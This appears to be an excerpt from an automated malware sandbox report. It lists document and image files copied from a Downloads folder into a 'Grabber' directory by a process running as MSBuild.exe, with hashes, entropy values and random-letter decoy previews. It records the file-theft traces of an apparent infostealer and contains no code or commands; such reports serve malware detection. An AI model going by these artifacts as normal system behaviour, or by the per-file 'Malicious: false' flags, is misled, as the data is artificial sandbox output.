HOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\IPKGELNTQY.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\IPKGELNTQY.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LSBIHQFDVT.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LSBIHQFDVT.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\MXPXCVPDVN.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\MXPXCVPDVN.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NEBFQQYWPS.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\QCFWYSKMHA.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\QNCYCDFIJJ.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\SFPUSAFIOL.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\SFPUSAFIOL.pdf

Download File

